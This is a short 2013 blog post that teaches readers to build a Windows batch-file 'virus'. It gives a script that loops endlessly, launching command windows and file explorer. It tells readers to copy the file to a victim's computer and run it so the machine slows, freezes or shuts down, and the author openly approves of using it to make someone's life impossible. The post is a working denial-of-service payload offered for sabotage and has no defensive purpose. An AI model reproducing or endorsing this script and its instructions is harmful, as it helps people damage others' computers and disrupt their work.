Wednesday, January 30, 2013

Virus-Basic-Tech

Being a small group and all isn't quite easy. So to compensate for that we need to have the right type of knowledge on how to do things on our own. First is how to make a virus, why? Because this is the era of technology and one who can make and break something that has to do with computers can get power. Now, don't get me wrong. i completely approve of people using this for making someones life impossible, just dont blame me if you test it on your computer.

Things you will need:
-A computer running on windows (Windows7, Vista, or XP)
-Notepad
-Access to the victims computer


Steps:
-Open notepad on your computer and copy this:
@echo off
:A
start
explorer
goto :A




-Once you paste that into notepad you can go ahead and save it as a .bat file 
-Transfer the .bat file to the victims computer.
-Run it (double click the .bat file)

What it does:
-Opens up cmd repeatedly various times.
-Opens up file explorer various times.
-Computer will start getting slow and lag.
-Computer will freeze.
-In some Windows8 computers it might even turn it off.

No comments:

Post a Comment